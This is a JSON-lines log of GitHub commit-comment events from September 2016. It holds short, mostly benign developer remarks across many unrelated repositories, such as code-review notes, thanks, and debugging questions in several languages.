{"id":"4578009217","type":"CommitCommentEvent","actor":{"login":"Isurusachitha"},"repo":{"name":"Isurusachitha/hello_world"},"payload":{"comment":{"id":19064772,"position":null,"line":null,"path":null,"commit_id":"88fb1bbbc3e8edc0c3da3927cbba16a57702cfe4","created_at":"2016-09-17T14:02:44Z","updated_at":"2016-09-17T14:02:44Z","body":"#include <stdio.h>\r\n\r\nint main(){\r\nprintf(\"Hello World !\");\r\n\r\nreturn 0;\r\n}"}},"created_at":"2016-09-17T14:02:44Z"}
{"id":"4578009679","type":"CommitCommentEvent","actor":{"login":"ThePhD"},"repo":{"name":"ThePhD/lua-bench"},"payload":{"comment":{"id":19064773,"position":null,"line":null,"path":null,"commit_id":"a7925e830a7bb3e7ce6d2d4ca9c5cd5b3ddbc048","created_at":"2016-09-17T14:03:04Z","updated_at":"2016-09-17T14:03:04Z","body":"@aDevilInMe OOLua supports turning a C++ member variables into a ('member') function in Lua. That's fundamentally different from turning a C++ member variable into something that can be accessed with '.' syntax in Lua, without any kind of function call.\r\n\r\nThe reason I say there's partial support for it is because there's code, already written in Lua and already written against libraries like luabind, that hold to the standard that `obj.a = 24` modifies a variable on that table/userdata specifically, not a class static.\r\n\r\nI had sol2 listed as no / partial support for a while with member variables for this same reason: people porting from luabind could not expect code they've written with `def_readwrite` or the luabind property syntax to work. Thusly, for them, it's not a member variable (in the Lua sense). It's a harsh demand that puts a lot of libraries into the 'partial / unsupported' category, but it's a real one. Sorry. =/"}},"created_at":"2016-09-17T14:03:04Z"}
{"id":"4578011699","type":"CommitCommentEvent","actor":{"login":"liyang0612"},"repo":{"name":"liyang0612/frist-github"},"payload":{"comment":{"id":19064777,"position":null,"line":null,"path":null,"commit_id":"268c337ada966e80d6147d7e08070e73431147a8","created_at":"2016-09-17T14:03:52Z","updated_at":"2016-09-17T14:03:52Z","body":"hello world"}},"created_at":"2016-09-17T14:03:52Z"}
{"id":"4578014206","type":"CommitCommentEvent","actor":{"login":"CodyJanousek"},"repo":{"name":"CodyJanousek/a1_minwage"},"payload":{"comment":{"id":19064783,"position":null,"line":null,"path":null,"commit_id":"519bd0aa7bbc861d7ac6f53493ef0f73396c192e","created_at":"2016-09-17T14:05:25Z","updated_at":"2016-09-17T14:05:25Z","body":"Replicating \r\nTable 2 - Means of Key Variables\r\nTable 3 (Rows 1-3) - Average Employment Per Store Before and After\r\nTable 4 - Reduced-form Models for Change in Employment\r\n"}},"created_at":"2016-09-17T14:05:25Z"}
{"id":"4578014479","type":"CommitCommentEvent","actor":{"login":"CodyJanousek"},"repo":{"name":"CodyJanousek/a1_minwage"},"payload":{"comment":{"id":19064785,"position":null,"line":null,"path":null,"commit_id":"519bd0aa7bbc861d7ac6f53493ef0f73396c192e","created_at":"2016-09-17T14:05:35Z","updated_at":"2016-09-17T14:05:35Z","body":"YEAH\r\n"}},"created_at":"2016-09-17T14:05:35Z"}
{"id":"4578015540","type":"CommitCommentEvent","actor":{"login":"unuldur"},"repo":{"name":"facelesspanda/almo"},"payload":{"comment":{"id":19064786,"position":null,"line":null,"path":null,"commit_id":"b9e587f7c762637fa4df5ba1a8f87e5fded41b79","created_at":"2016-09-17T14:06:15Z","updated_at":"2016-09-17T14:06:15Z","body":"Ok je regarderais ça lundi pour moi pour voir si je trouve une solution.\r\nEt parfait pour Qtspim ça sera certainement mieux. "}},"created_at":"2016-09-17T14:06:15Z"}
{"id":"4578017749","type":"CommitCommentEvent","actor":{"login":"acrm"},"repo":{"name":"EkaSe/HelloWorld"},"payload":{"comment":{"id":19064790,"position":17,"line":0,"path":"HelloWorld/Program.cs","commit_id":"bacae4a3d042ea6619d14361fcd6bd1340b66ded","created_at":"2016-09-17T14:07:44Z","updated_at":"2016-09-17T14:07:44Z","body":"Я вообще не очень одобряю такой отладочный вывод информации. Это вполне можно в отладке посмотреть, поставив в этом месте точку останова. А пользователю функционала эта информация в принципе не нужна. "}},"created_at":"2016-09-17T14:07:44Z"}
{"id":"4578021613","type":"CommitCommentEvent","actor":{"login":"monsta"},"repo":{"name":"mate-desktop/mate-common"},"payload":{"comment":{"id":19064793,"position":null,"line":null,"path":null,"commit_id":"0cbb9c88dc747d8521be9e452b21b15bfdd98196","created_at":"2016-09-17T14:10:15Z","updated_at":"2016-09-17T14:10:15Z","body":"Yes, I'm late on this, but I'll start today. Don't worry please :smile:\r\nDid you already tag mate-common? I'd like to edit the NEWS here as well."}},"created_at":"2016-09-17T14:10:15Z"}
{"id":"4578022297","type":"CommitCommentEvent","actor":{"login":"poutsma"},"repo":{"name":"spring-projects/spring-framework"},"payload":{"comment":{"id":19064795,"position":33,"line":36,"path":"spring-web-reactive/src/main/java/org/springframework/web/reactive/function/BodyInsertor.java","commit_id":"3f5570641359b13c3d9139879c66500f31d007c5","created_at":"2016-09-17T14:10:43Z","updated_at":"2016-09-17T14:10:43Z","body":"Fixed, see 778ef026801533c6030d774d52504ef9a72cb48f."}},"created_at":"2016-09-17T14:10:43Z"}
{"id":"4578023555","type":"CommitCommentEvent","actor":{"login":"meleu"},"repo":{"name":"RetroPie/RetroPie-Setup"},"payload":{"comment":{"id":19064799,"position":null,"line":null,"path":null,"commit_id":"5f6b7e19598ae4f9fa093f9c1b29f006d001c4b9","created_at":"2016-09-17T14:11:37Z","updated_at":"2016-09-17T14:11:37Z","body":"just a little optimization suggestion: the current conditions to show the dialog can be verified at the beginning. So there's no need for searching images (`for` loop). ;-)"}},"created_at":"2016-09-17T14:11:37Z"}
{"id":"4578025874","type":"CommitCommentEvent","actor":{"login":"GuillaumeWrobel"},"repo":{"name":"achab/cross-reco"},"payload":{"comment":{"id":19064802,"position":null,"line":null,"path":null,"commit_id":"efe15355432c9b78c8fabfd7f52d2234a541ae2a","created_at":"2016-09-17T14:13:13Z","updated_at":"2016-09-17T14:13:13Z","body":"The `parse_items` function is very smart. Your job is pretty impressive! Would you be interested in an exciting project regarding car parking and smart city?"}},"created_at":"2016-09-17T14:13:13Z"}
{"id":"4578028246","type":"CommitCommentEvent","actor":{"login":"kecnry"},"repo":{"name":"phoebe-project/phoebe2"},"payload":{"comment":{"id":19064806,"position":null,"line":null,"path":null,"commit_id":"3b28a4c48af8f1ad9c4980e4cf0e74d6168fab22","created_at":"2016-09-17T14:14:54Z","updated_at":"2016-09-17T14:14:54Z","body":"@horvatm - done in da5a0c5"}},"created_at":"2016-09-17T14:14:54Z"}
{"id":"4578028449","type":"CommitCommentEvent","actor":{"login":"Zarel"},"repo":{"name":"Zarel/Pokemon-Showdown-Client"},"payload":{"comment":{"id":19064808,"position":5,"line":736,"path":"js/search.js","commit_id":"175718cbed4e36f16d648509ba3bb66c38d9a30c","created_at":"2016-09-17T14:15:02Z","updated_at":"2016-09-17T14:15:02Z","body":"...wat"}},"created_at":"2016-09-17T14:15:02Z"}
{"id":"4578029345","type":"CommitCommentEvent","actor":{"login":"joolswills"},"repo":{"name":"RetroPie/RetroPie-Setup"},"payload":{"comment":{"id":19064811,"position":null,"line":null,"path":null,"commit_id":"5f6b7e19598ae4f9fa093f9c1b29f006d001c4b9","created_at":"2016-09-17T14:15:35Z","updated_at":"2016-09-17T14:15:35Z","body":"yep, because of that recent logic change, to not show dialog even if no image. I may switch it around."}},"created_at":"2016-09-17T14:15:35Z"}
{"id":"4578029388","type":"CommitCommentEvent","actor":{"login":"sbrannen"},"repo":{"name":"spring-projects/spring-framework"},"payload":{"comment":{"id":19064812,"position":33,"line":36,"path":"spring-web-reactive/src/main/java/org/springframework/web/reactive/function/BodyInsertor.java","commit_id":"3f5570641359b13c3d9139879c66500f31d007c5","created_at":"2016-09-17T14:15:36Z","updated_at":"2016-09-17T14:15:36Z","body":"That allows the built-in spellchecker module in my brain to continue to operate in background mode. Thanks! 👍 "}},"created_at":"2016-09-17T14:15:36Z"}
{"id":"4578030672","type":"CommitCommentEvent","actor":{"login":"joolswills"},"repo":{"name":"RetroPie/RetroPie-Setup"},"payload":{"comment":{"id":19064816,"position":null,"line":null,"path":null,"commit_id":"5f6b7e19598ae4f9fa093f9c1b29f006d001c4b9","created_at":"2016-09-17T14:16:29Z","updated_at":"2016-09-17T14:16:29Z","body":"actually, maybe not - because of the launching images check (since we don't display the dialog if we find a launching image)."}},"created_at":"2016-09-17T14:16:29Z"}
{"id":"4578031978","type":"CommitCommentEvent","actor":{"login":"joolswills"},"repo":{"name":"RetroPie/RetroPie-Setup"},"payload":{"comment":{"id":19064817,"position":null,"line":null,"path":null,"commit_id":"5f6b7e19598ae4f9fa093f9c1b29f006d001c4b9","created_at":"2016-09-17T14:17:25Z","updated_at":"2016-09-17T14:17:25Z","body":"the check for the launching images needs to be first."}},"created_at":"2016-09-17T14:17:25Z"}
{"id":"4578031991","type":"CommitCommentEvent","actor":{"login":"Annenkoff"},"repo":{"name":"Corrandoo/QuboBot"},"payload":{"comment":{"id":19064818,"position":null,"line":null,"path":null,"commit_id":"c2a86cea9453c4c40f449e6d9ad0569a99f2421d","created_at":"2016-09-17T14:17:25Z","updated_at":"2016-09-17T14:17:25Z","body":"Лол :D"}},"created_at":"2016-09-17T14:17:25Z"}
{"id":"4578032100","type":"CommitCommentEvent","actor":{"login":"f2404"},"repo":{"name":"xfce-mirror/xfce4-settings"},"payload":{"comment":{"id":19064819,"position":36,"line":259,"path":"dialogs/accessibility-settings/main.c","commit_id":"838aa6f1c5344d45dde51acb31f165ccd26f666d","created_at":"2016-09-17T14:17:29Z","updated_at":"2016-09-17T14:17:29Z","body":"Shouldn't these be surrounded by #ifdef GDK_WINDOWING_X11 ?"}},"created_at":"2016-09-17T14:17:29Z"}
{"id":"4578032783","type":"CommitCommentEvent","actor":{"login":"shenhuaze"},"repo":{"name":"shenhuaze/LeetCode-from0toInfinity"},"payload":{"comment":{"id":19064822,"position":null,"line":null,"path":null,"commit_id":"e74e6f57b1a4fd9dc0f5e08eee312f2a30915488","created_at":"2016-09-17T14:17:59Z","updated_at":"2016-09-17T14:17:59Z","body":"mergeSortedArrays.c"}},"created_at":"2016-09-17T14:17:59Z"}
{"id":"4578033398","type":"CommitCommentEvent","actor":{"login":"justinp"},"repo":{"name":"scalawag/jibe"},"payload":{"comment":{"id":19064823,"position":null,"line":null,"path":null,"commit_id":"36ff865032aca8f11e95bbc728eff609d5ffa1ab","created_at":"2016-09-17T14:18:23Z","updated_at":"2016-09-17T14:18:23Z","body":"@ecassady @dwcramer \r\n\r\nI didn't do a pull request for this because we already talked about it and it seems a little heavy for a comment.  Anyway, this is where I moved all of the bash logic into scripts.  There are a few interesting consequences of this.\r\n\r\nScripts are longer than they used to be because they include all the logic of skipping sections where they're not appropriate.  Before, I did that stuff in Scala and the script ended up shorter if it had less logic.  (This is related to the change in moving all the parameters to the top instead of sprinkling them throughout.)  Now, the scripts contain all the logic whether that instance (based on its parameters) of the script needs it or not.  See CreateOrUpdateUserCommand_test.sh for the clearest example, where I have to test each of the attributes to see if they are different but each test is enabled by the existence of the attribute parameter.\r\n\r\nI kept the \"script\" file in the report directory, which shows what was actually run, because it's possible to create the script the way I was doing before for now.  I don't see any reason to prohibit that for now."}},"created_at":"2016-09-17T14:18:23Z"}
{"id":"4578036342","type":"CommitCommentEvent","actor":{"login":"ramohse"},"repo":{"name":"ramohse/dsp"},"payload":{"comment":{"id":19064828,"position":null,"line":null,"path":null,"commit_id":"a28f8f6dd1d78336f265fd9eb6b67421e5eef94c","created_at":"2016-09-17T14:20:25Z","updated_at":"2016-09-17T14:20:25Z","body":"Hi Luc,\r\n\r\nThank you for the feedback! Especially the more efficient Python code :relaxed: I appreciate you taking the time to look over it all and give pointers/corrections. I look forward to more in the coming weeks!\r\n\r\nCheers,\r\nMarcus"}},"created_at":"2016-09-17T14:20:25Z"}
{"id":"4578037316","type":"CommitCommentEvent","actor":{"login":"Sakrecoer"},"repo":{"name":"Sakrecoer/baby-gnu-tux"},"payload":{"comment":{"id":19064830,"position":null,"line":null,"path":null,"commit_id":"d93293a976bb55468eecb3258355482a2e889378","created_at":"2016-09-17T14:21:04Z","updated_at":"2016-09-17T14:21:04Z","body":"oops.... added the backup blender file ... wait a second..."}},"created_at":"2016-09-17T14:21:04Z"}
{"id":"4578039427","type":"CommitCommentEvent","actor":{"login":"mgol"},"repo":{"name":"jquery/qunit"},"payload":{"comment":{"id":19064832,"position":3,"line":2,"path":"test/stack-errors.js","commit_id":"89731f969e6ab9201149c0a1d23767aec6ca72d9","created_at":"2016-09-17T14:22:35Z","updated_at":"2016-09-17T14:22:35Z","body":"Are both `global` and `exported` needed?"}},"created_at":"2016-09-17T14:22:35Z"}
{"id":"4578041111","type":"CommitCommentEvent","actor":{"login":"SuperXingKong"},"repo":{"name":"lightda104530/BetaTester"},"payload":{"comment":{"id":19064835,"position":null,"line":null,"path":null,"commit_id":"5efc92cd1405bd35255a3b8eb8711effa19fd287","created_at":"2016-09-17T14:23:46Z","updated_at":"2016-09-17T14:23:46Z","body":"能否使用？"}},"created_at":"2016-09-17T14:23:46Z"}
{"id":"4578041315","type":"CommitCommentEvent","actor":{"login":"kotishe"},"repo":{"name":"smoldar/OregonCore"},"payload":{"comment":{"id":19064836,"position":null,"line":null,"path":null,"commit_id":"7ecd7248fb0a280338ab938e976482c27ab74879","created_at":"2016-09-17T14:23:56Z","updated_at":"2016-09-17T14:23:56Z","body":"ty!"}},"created_at":"2016-09-17T14:23:56Z"}
{"id":"4578044765","type":"CommitCommentEvent","actor":{"login":"platinumazure"},"repo":{"name":"jquery/qunit"},"payload":{"comment":{"id":19064841,"position":3,"line":2,"path":"test/stack-errors.js","commit_id":"89731f969e6ab9201149c0a1d23767aec6ca72d9","created_at":"2016-09-17T14:26:13Z","updated_at":"2016-09-17T14:26:13Z","body":"In this case, yes. `global` tells ESLint rule `no-undef` that variable `polluteGlobal` is in fact a global and so doesn't need a declaration (and also that the global is meant to be writable); `exported` tells ESLint rule `no-unused-vars` that `polluteGlobal` is considered used outside this script, whereas the rule otherwise would flag `polluteGlobal` as only being written to, never read within this script.\r\n\r\nIn general, you wouldn't need both, because you'd probably be reading the global as well (so `no-unused-vars` wouldn't complain). Then you would only need `global` to tell ESLint that the variable is declared outside the script. This is just a weird test case where the global is literally only written for side effects elsewhere."}},"created_at":"2016-09-17T14:26:13Z"}
{"id":"4578045125","type":"CommitCommentEvent","actor":{"login":"gaqzi"},"repo":{"name":"gaqzi/radish"},"payload":{"comment":{"id":19064842,"position":15,"line":14,"path":"maybe/executioners.py","commit_id":"9c46bb5f6b61aee5c08c8bbc6ae776ed3500cb12","created_at":"2016-09-17T14:26:28Z","updated_at":"2016-09-17T14:26:28Z","body":"❤️ \r\nI've renamed the `Executioner` to `Executor` and changed it's `run` method to `execute` as well. An executor never run from their task, they execute. ;)"}},"created_at":"2016-09-17T14:26:28Z"}
{"id":"4578046055","type":"CommitCommentEvent","actor":{"login":"krOoze"},"repo":{"name":"KhronosGroup/Vulkan-Docs"},"payload":{"comment":{"id":19064844,"position":11,"line":11,"path":"doc/specs/vulkan/appendices/VK_EXT_validation_flags.txt","commit_id":"ef053e7c82447b292c96470a24dd135f2da78b10","created_at":"2016-09-17T14:27:07Z","updated_at":"2016-09-17T14:27:07Z","body":"Date format not updated."}},"created_at":"2016-09-17T14:27:07Z"}
{"id":"4578046111","type":"CommitCommentEvent","actor":{"login":"meleu"},"repo":{"name":"RetroPie/RetroPie-Setup"},"payload":{"comment":{"id":19064845,"position":null,"line":null,"path":null,"commit_id":"5f6b7e19598ae4f9fa093f9c1b29f006d001c4b9","created_at":"2016-09-17T14:27:08Z","updated_at":"2016-09-17T14:27:08Z","body":"I agree. To show the dialog when the `use_art` is disabled. Sorry."}},"created_at":"2016-09-17T14:27:08Z"}
{"id":"4578047091","type":"CommitCommentEvent","actor":{"login":"gaqzi"},"repo":{"name":"gaqzi/radish"},"payload":{"comment":{"id":19064849,"position":18,"line":18,"path":"maybe/differs.py","commit_id":"9c46bb5f6b61aee5c08c8bbc6ae776ed3500cb12","created_at":"2016-09-17T14:27:53Z","updated_at":"2016-09-17T14:27:53Z","body":"Very good points. I don't like how this class is working as it also duplicates a lot of logic from the `Executor`.\r\nI'll see if there's a good wrapper around git to use instead, or just create a utility to run a command and deal with output. Or just reuse the executor with no outputter."}},"created_at":"2016-09-17T14:27:53Z"}
{"id":"4578048168","type":"CommitCommentEvent","actor":{"login":"krOoze"},"repo":{"name":"KhronosGroup/Vulkan-Docs"},"payload":{"comment":{"id":19064854,"position":23,"line":16,"path":"doc/specs/vulkan/appendices/VK_KHR_display/vk_khr_display.txt","commit_id":"ef053e7c82447b292c96470a24dd135f2da78b10","created_at":"2016-09-17T14:28:38Z","updated_at":"2016-09-17T14:28:38Z","body":"Also not updated format"}},"created_at":"2016-09-17T14:28:38Z"}
{"id":"4578049420","type":"CommitCommentEvent","actor":{"login":"karussell"},"repo":{"name":"graphhopper/graphhopper"},"payload":{"comment":{"id":19064858,"position":null,"line":null,"path":null,"commit_id":"c9a9adad70c1ae0830387eed4da02d4c40e03ecd","created_at":"2016-09-17T14:29:27Z","updated_at":"2016-09-17T14:29:27Z","body":"Using npm 3.10.7 and node v6.4.0 I have now recreated the main.js but it still produces the same. Really strange.\r\n"}},"created_at":"2016-09-17T14:29:27Z"}
{"id":"4578049940","type":"CommitCommentEvent","actor":{"login":"chalin"},"repo":{"name":"angular/angular.io"},"payload":{"comment":{"id":19064859,"position":19,"line":18,"path":"public/docs/ts/latest/_data.json","commit_id":"65db6b9268310d4811a5d37069aa1e59489183e7","created_at":"2016-09-17T14:29:48Z","updated_at":"2016-09-17T14:29:48Z","body":"@alexwolfe - Quickstart \"lost\" its title in this commit so that now it shows up as the default title \"Angular\". Was this intentional?\r\n\r\ncc @naomiblack @ericjim "}},"created_at":"2016-09-17T14:29:48Z"}
{"id":"4578050420","type":"CommitCommentEvent","actor":{"login":"RobertDeRose"},"repo":{"name":"birarda/logan"},"payload":{"comment":{"id":19064860,"position":6,"line":25,"path":"lib/logan/todo.rb","commit_id":"2ebd2fb39970307455f4b37c7b4e4f6816f350d4","created_at":"2016-09-17T14:30:07Z","updated_at":"2016-09-17T14:30:07Z","body":"I don't get it, this didn't remove the call to `blank?`  it's still right there and blowing up for people that don't include rails"}},"created_at":"2016-09-17T14:30:07Z"}
{"id":"4578051602","type":"CommitCommentEvent","actor":{"login":"buddhi1980"},"repo":{"name":"buddhi1980/mandelbulber2"},"payload":{"comment":{"id":19064862,"position":null,"line":null,"path":null,"commit_id":"32b8b89ec7bcf47855385b58b56ede22705c9ef7","created_at":"2016-09-17T14:30:47Z","updated_at":"2016-09-17T14:30:47Z","body":"Popup window and loading of description works, but saving of description stopped working"}},"created_at":"2016-09-17T14:30:47Z"}
{"id":"4578053538","type":"CommitCommentEvent","actor":{"login":"karussell"},"repo":{"name":"graphhopper/graphhopper"},"payload":{"comment":{"id":19064865,"position":null,"line":null,"path":null,"commit_id":"c9a9adad70c1ae0830387eed4da02d4c40e03ecd","created_at":"2016-09-17T14:32:05Z","updated_at":"2016-09-17T14:32:05Z","body":"Cannot find a related bug: https://github.com/substack/node-browserify/issues?utf8=%E2%9C%93&q=is%3Aissue%20is%3Aopen%20different"}},"created_at":"2016-09-17T14:32:05Z"}
{"id":"4578054862","type":"CommitCommentEvent","actor":{"login":"buddhi1980"},"repo":{"name":"buddhi1980/mandelbulber2"},"payload":{"comment":{"id":19064869,"position":null,"line":null,"path":null,"commit_id":"32b8b89ec7bcf47855385b58b56ede22705c9ef7","created_at":"2016-09-17T14:33:03Z","updated_at":"2016-09-17T14:33:03Z","body":"When settings are loaded only popup window is showed but text is not displayed in new description editor"}},"created_at":"2016-09-17T14:33:03Z"}
{"id":"4578056055","type":"CommitCommentEvent","actor":{"login":"wffranco"},"repo":{"name":"yuche/vue-strap"},"payload":{"comment":{"id":19064871,"position":11,"line":204,"path":"src/Input.vue","commit_id":"45c25305140cff65e01b197d702539f0ebaa9109","created_at":"2016-09-17T14:33:55Z","updated_at":"2016-09-17T14:33:55Z","body":"Working on that."}},"created_at":"2016-09-17T14:33:55Z"}
{"id":"4578056481","type":"CommitCommentEvent","actor":{"login":"pthahnil"},"repo":{"name":"goagent/goagent"},"payload":{"comment":{"id":19064872,"position":null,"line":null,"path":null,"commit_id":"e492ed0283f5cde7cf71d7ac47429f64aa48cd13","created_at":"2016-09-17T14:34:14Z","updated_at":"2016-09-17T14:34:14Z","body":"Nooooooooooooooooooooooooooooooooooooooo!!!!!!!!!!!!!!!!"}},"created_at":"2016-09-17T14:34:14Z"}
{"id":"4578058388","type":"CommitCommentEvent","actor":{"login":"karussell"},"repo":{"name":"graphhopper/graphhopper"},"payload":{"comment":{"id":19064874,"position":null,"line":null,"path":null,"commit_id":"c9a9adad70c1ae0830387eed4da02d4c40e03ecd","created_at":"2016-09-17T14:35:30Z","updated_at":"2016-09-17T14:35:30Z","body":"Ok, now I'm confused. Removed node_modules and did `npm install` again now I have a different main.js ... please check if this is identical to yours."}},"created_at":"2016-09-17T14:35:30Z"}
{"id":"4578058779","type":"CommitCommentEvent","actor":{"login":"ssbn-412-42"},"repo":{"name":"ssbn-412-42/Leaning"},"payload":{"comment":{"id":19064875,"position":null,"line":null,"path":null,"commit_id":"e8ee45514594f8d34317feb54410feb3ca73e790","created_at":"2016-09-17T14:35:43Z","updated_at":"2016-09-17T14:35:43Z","body":"添加基础数据"}},"created_at":"2016-09-17T14:35:43Z"}
{"id":"4578060330","type":"CommitCommentEvent","actor":{"login":"MichaelGrafnetter"},"repo":{"name":"MichaelGrafnetter/DSInternals"},"payload":{"comment":{"id":19064876,"position":null,"line":null,"path":null,"commit_id":"c6fb24c78cedeba8ddecf51f2bc83ad1525f4a54","created_at":"2016-09-17T14:36:36Z","updated_at":"2016-09-17T14:36:36Z","body":"This commit should have referenced issue #25 instead of #17... I was simply too eager to release version 2.17. "}},"created_at":"2016-09-17T14:36:36Z"}
{"id":"4578062240","type":"CommitCommentEvent","actor":{"login":"mislav"},"repo":{"name":"ahri/rake-vs"},"payload":{"comment":{"id":19064880,"position":null,"line":null,"path":null,"commit_id":"25b51a11d5f1440e9049211a058b9792ddf8cd90","created_at":"2016-09-17T14:37:51Z","updated_at":"2016-09-17T14:37:51Z","body":"You're welcome!"}},"created_at":"2016-09-17T14:37:51Z"}
{"id":"4578062766","type":"CommitCommentEvent","actor":{"login":"ngoquang2708"},"repo":{"name":"ngoquang2708/android_device_samsung_vivalto3gvn"},"payload":{"comment":{"id":19064882,"position":null,"line":null,"path":null,"commit_id":"bb12130b3135fc21f31bf639dc595ac6ca1addc6","created_at":"2016-09-17T14:38:13Z","updated_at":"2016-09-17T14:38:13Z","body":"What error?\n\n2016-09-17 20:50 GMT+07:00 thanhthuy89 <notifications@github.com>:\n\n> I can not flash it. please help me ( both twrp 3.0.2.0 & twrp 2.8.5.0\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/ngoquang2708/android_device_samsung_vivalto3gvn/commit/bb12130b3135fc21f31bf639dc595ac6ca1addc6#commitcomment-19064743>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AJOl9mTgfwYdJRQSrBBDs7oBh-GMoO9cks5qq_A6gaJpZM4J4Cgx>\n> .\n>\n"}},"created_at":"2016-09-17T14:38:13Z"}
{"id":"4578062863","type":"CommitCommentEvent","actor":{"login":"xtne6f"},"repo":{"name":"xtne6f/EDCB"},"payload":{"comment":{"id":19064883,"position":null,"line":null,"path":null,"commit_id":"0771bd44a8ab25df7c37eef5fa9fda609309afa5","created_at":"2016-09-17T14:38:19Z","updated_at":"2016-09-17T14:38:19Z","body":"感謝します。まだ確認していませんがきっと再現すると思います。\r\n報告うけて気付いたのですが、CEpgTimerSrvMain::AutoAddReserveEPGの変更はデッドロック条件に抵触しますねorz\r\n// epgDBのコールバック内部でreserveManagerのロックを確保する一方、別の場所ではreserveManager内部でepgDBを呼ぶこともあるため\r\nAutoAddReserveEPG以外の変更は単に表現の違いなので、ほぼ間違いなくここが犯人です。\r\nマージ前でよかった…"}},"created_at":"2016-09-17T14:38:19Z"}
{"id":"4578063430","type":"CommitCommentEvent","actor":{"login":"DendyTheElephant"},"repo":{"name":"DendyTheElephant/PixPhetamine"},"payload":{"comment":{"id":19064885,"position":5,"line":39,"path":"Pixphetamine/code/hdr/CShader.h","commit_id":"b164a38c2b3284d54b36358fa671b6627c296889","created_at":"2016-09-17T14:38:42Z","updated_at":"2016-09-17T14:38:42Z","body":"Qu'est ce que c'est que cette magie noire ? :o \r\nJe l'ai pas pris ce changement... est ce que ça fait partie du fix provisioire pour le chemin des shaders?"}},"created_at":"2016-09-17T14:38:42Z"}
{"id":"4578063781","type":"CommitCommentEvent","actor":{"login":"rdnewman"},"repo":{"name":"valoriedodge/Pomodoro-Project"},"payload":{"comment":{"id":19064886,"position":261,"line":4,"path":"app/scripts/services/Timer.js","commit_id":"31e26210ad1cc3c7bd940b0e34f83970906d482d","created_at":"2016-09-17T14:38:57Z","updated_at":"2016-09-17T14:38:57Z","body":"You should only use snake_case when naming local variables.   PascalCase (camelcase with initial letter capitalized) should be used for classes and constructors.  camelCase (PascalCase with initial letter lowercase) for objects, etc.\r\n\r\nNote that in this function, your local \"Timer\" and the function name \"Timer\" is a naming collision.   I'd probably prefer that your line 3 just go with \"timer\" if you intend that to be separate object from the function.\r\n\r\nAlso see https://github.com/airbnb/javascript#variables and https://github.com/mgechev/angularjs-style-guide for other style advice. "}},"created_at":"2016-09-17T14:38:57Z"}
{"id":"4578064042","type":"CommitCommentEvent","actor":{"login":"minicarpet"},"repo":{"name":"minicarpet/Spinning-LED"},"payload":{"comment":{"id":19064887,"position":1,"line":1,"path":"README.md","commit_id":"81be032748ac24b1b90bed7c843e13b21f1bb571","created_at":"2016-09-17T14:39:09Z","updated_at":"2016-09-17T14:39:09Z","body":"test"}},"created_at":"2016-09-17T14:39:09Z"}
{"id":"4578064249","type":"CommitCommentEvent","actor":{"login":"EwaPerzanowska"},"repo":{"name":"EwaPerzanowska/learning-sass"},"payload":{"comment":{"id":19064888,"position":null,"line":null,"path":null,"commit_id":"674c653772a10e774e8925f60191e04eaf6419ab","created_at":"2016-09-17T14:39:17Z","updated_at":"2016-09-17T14:39:17Z","body":"Na razie usunęłam je ze śledzenia komendą rm, teraz chciałam je umieścić w folderze .gitignore, ale na windowsie nie mogłam go utworzyć. Poczytałam o tym i znalazłam radę, żeby skorzystać z komendy rename w wierszu poleceń, ale niestety ciągle pokazuje mi się komunikat, że komenda jest nieprawidłowa. Moja komenda wygląda tak:\r\nC:\\Users\\Ewa\\Desktop\\nauka sass\\gitignore>rename C:\\Users\\Ewa\\Desktop\\nauka sass\\gitignore .gitignore\r\nThe syntax of the command is incorrect.\r\n\r\nMógłbyś mi dać znać jaki robię błąd?"}},"created_at":"2016-09-17T14:39:17Z"}
{"id":"4578065360","type":"CommitCommentEvent","actor":{"login":"LukasReschke"},"repo":{"name":"owncloud/richdocuments"},"payload":{"comment":{"id":19064890,"position":null,"line":null,"path":null,"commit_id":"7a0d2b944cde026abd6527bf3e51f41e809faa9c","created_at":"2016-09-17T14:40:04Z","updated_at":"2016-09-17T14:40:04Z","body":"This breaks saving the settings :-)"}},"created_at":"2016-09-17T14:40:04Z"}
{"id":"4578065692","type":"CommitCommentEvent","actor":{"login":"rdnewman"},"repo":{"name":"valoriedodge/Pomodoro-Project"},"payload":{"comment":{"id":19064891,"position":null,"line":null,"path":null,"commit_id":"31e26210ad1cc3c7bd940b0e34f83970906d482d","created_at":"2016-09-17T14:40:16Z","updated_at":"2016-09-17T14:40:16Z","body":"see inline comments in timer.js"}},"created_at":"2016-09-17T14:40:16Z"}
{"id":"4578066435","type":"CommitCommentEvent","actor":{"login":"waxzce"},"repo":{"name":"CleverCloud/warp10-scala-client"},"payload":{"comment":{"id":19064896,"position":null,"line":null,"path":null,"commit_id":"1a79011702043496eef62f5e9f598c336ec16166","created_at":"2016-09-17T14:40:44Z","updated_at":"2016-09-17T14:40:44Z","body":"https://bintray.com/clevercloud/maven/warp10-scala-client version published"}},"created_at":"2016-09-17T14:40:44Z"}
{"id":"4578066634","type":"CommitCommentEvent","actor":{"login":"cicku"},"repo":{"name":"gfwlist/gfwlist"},"payload":{"comment":{"id":19064898,"position":null,"line":null,"path":null,"commit_id":"e13b50f6b26cdf6c34ef530bf422e3742cfc4cf1","created_at":"2016-09-17T14:40:49Z","updated_at":"2016-09-17T14:40:49Z","body":"#352"}},"created_at":"2016-09-17T14:40:49Z"}
{"id":"4578067416","type":"CommitCommentEvent","actor":{"login":"amet"},"repo":{"name":"MrMC/mrmc"},"payload":{"comment":{"id":19064901,"position":20,"line":296,"path":"xbmc/pictures/GUIWindowSlideShow.cpp","commit_id":"221871b4ed891facec3cc8d7c7a085b52c64069e","created_at":"2016-09-17T14:41:18Z","updated_at":"2016-09-17T14:41:18Z","body":"I have no idea what you are talking about ... /me walks away :)"}},"created_at":"2016-09-17T14:41:18Z"}
{"id":"4578072547","type":"CommitCommentEvent","actor":{"login":"james34602"},"repo":{"name":"carlosrafaelgn/FPlayAndroid"},"payload":{"comment":{"id":19064910,"position":null,"line":null,"path":null,"commit_id":"42497182ca06e81975af4595e1627c6477ab1787","created_at":"2016-09-17T14:44:40Z","updated_at":"2016-09-17T14:44:40Z","body":"Nice!"}},"created_at":"2016-09-17T14:44:40Z"}
